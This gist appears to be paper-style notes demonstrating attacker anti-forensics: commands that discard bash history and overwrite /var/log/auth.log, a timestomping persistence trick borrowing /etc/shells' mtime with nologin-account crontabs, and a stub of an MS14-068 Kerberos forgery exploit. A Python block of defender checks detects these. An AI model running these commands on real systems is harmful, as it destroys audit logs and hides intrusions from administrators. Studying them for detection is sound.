@flaing
Created January 29, 2020 00:38
DEMOs: history nullification, persistence, privilege evasion.
Highly productive APTs combine phishing and social-engineering practices in pursuit of persistence\cite{falliere2011w32, cardenas2011attacks, maiorca2019digital, urbina2016limiting}. They usually share similar strategic goals, and cleaning or faking history increases the impact of those goals.
An example of common history cleaning:
{\footnotesize
\begin{verbatim}
ln -sf /dev/null ~/.bash_history   # history to null: future commands are discarded
history -c                         # clear the current session's history
echo "" > /var/log/auth.log        # overwrite the auth log (needs root)
export HISTFILESIZE=0              # length trick: history file truncated to zero lines
export HISTSIZE=0                  # no in-memory command history
unset HISTFILE                     # disable writing a history file at all
kill -9 $$                         # kill the session last, so bash never flushes history
\end{verbatim}
}
An example of trickier persistence:
{\footnotesize
\begin{verbatim}
## Accounts with a nologin shell in /etc/passwd (man, backup, daemon, bin):
## put authorizations in them and create crontabs for them.
SHELLS_TS=$(stat -c '%y' /etc/shells)  # shell trick: borrow the mtime of an untouched system file
# ... malicious logic here (not shown in the gist) ...
# then reset the timestamps of every touched path to the borrowed one
touch -d "$SHELLS_TS" \
    /lib/modprobe.d/ /media/cdrom1/ /usr/local/lib /etc/tmux.cf \
    /lib/modprobe.d/systemctrl.conf /media/cdrom1/debian.iso \
    /usr/local/lib/python3.9
# note: touch -d sets atime/mtime only; ctime still records the real change time
## now (/etc/passwd)(/usr/sbin/nologin) is compromised
\end{verbatim}
}
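Defender-side checks for the two demos above (history nullification, and timestomping with the mtime borrowed from /etc/shells) plus the nologin-account persistence note. This is an added example, not code from the gist; the function names, the one-second ctime gap and the temp-directory scenario in demo() are this example's own assumptions.

```python
import os
import stat
import tempfile
NOLOGIN_SHELLS = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false")

def history_nullified(home):
    """~/.bash_history symlinked to a device node such as /dev/null, or dangling."""
    path = os.path.join(home, ".bash_history")
    return os.path.islink(path) and (
        not os.path.exists(path) or stat.S_ISCHR(os.stat(path).st_mode))

def mtime_clones(reference, roots, min_gap_ns=10**9):
    """Files whose mtime equals the reference's (e.g. /etc/shells) to the
    nanosecond but whose ctime is >= min_gap_ns later: touch -d rewrites
    atime/mtime, the kernel still stamps ctime. Candidates to review, not verdicts."""
    ref, hits = os.lstat(reference), []
    for root in roots:
        for dirpath, _, names in os.walk(root):
            for name in names:
                p = os.path.join(dirpath, name)
                st = os.lstat(p)
                same = (st.st_ino, st.st_dev) == (ref.st_ino, ref.st_dev)  # reference itself
                if (not same and st.st_mtime_ns == ref.st_mtime_ns
                        and st.st_ctime_ns - st.st_mtime_ns >= min_gap_ns):
                    hits.append(p)
    return sorted(hits)

def nologin_with_crontab(passwd_text, crontab_owners):
    """Accounts whose login shell is nologin/false but that still own a crontab."""
    users = {f[0] for f in (l.split(":") for l in passwd_text.splitlines())
             if len(f) == 7 and f[6] in NOLOGIN_SHELLS}
    return sorted(users & set(crontab_owners))

def demo():
    """Constructed scenario in a temp dir (not a real host): returns (history nullified?, clone names)."""
    old = 1_000_000_000 * 10**9  # 2001-09-09 in ns; far older than any ctime set now
    with tempfile.TemporaryDirectory() as tmp:
        home, lib, shells = (os.path.join(tmp, d) for d in ("home", "lib", "shells"))
        os.makedirs(home); os.makedirs(lib)
        os.symlink("/dev/null", os.path.join(home, ".bash_history"))
        open(os.path.join(lib, "honest.conf"), "w").close()  # untouched control file
        for p in (shells, os.path.join(lib, "stomped.conf")):
            open(p, "w").close()
            os.utime(p, ns=(old, old))  # mimics touch -d "$SHELLS_TS"
        hits = [os.path.basename(p) for p in mtime_clones(shells, [lib])]
        return history_nullified(home), hits
```

Run the first two functions against a mounted image or a live root with the real /etc/shells as the reference; demo() only exercises them on constructed data.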
Beyond hard-to-detect history clearing and persistence, attackers can also bypass intrusion detection and prevention by gaining the highest privilege. Even in a cloud environment, an attacker can forge a Kerberos ticket to obtain a domain administrator's session key, as with MS14-068 against a Kerberos-based Azure cloud.
{\footnotesize
\begin{verbatim}
def sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b,
           target_realm, target_service, target_host, output_filename,
           krbtgt_a_key=None, trust_ab_key=None, target_key=None):
    ..  # body elided in the gist
    session_key = (int(as_rep_enc['key']['keytype']),
                   str(as_rep_enc['key']['keyvalue']))
\end{verbatim}
}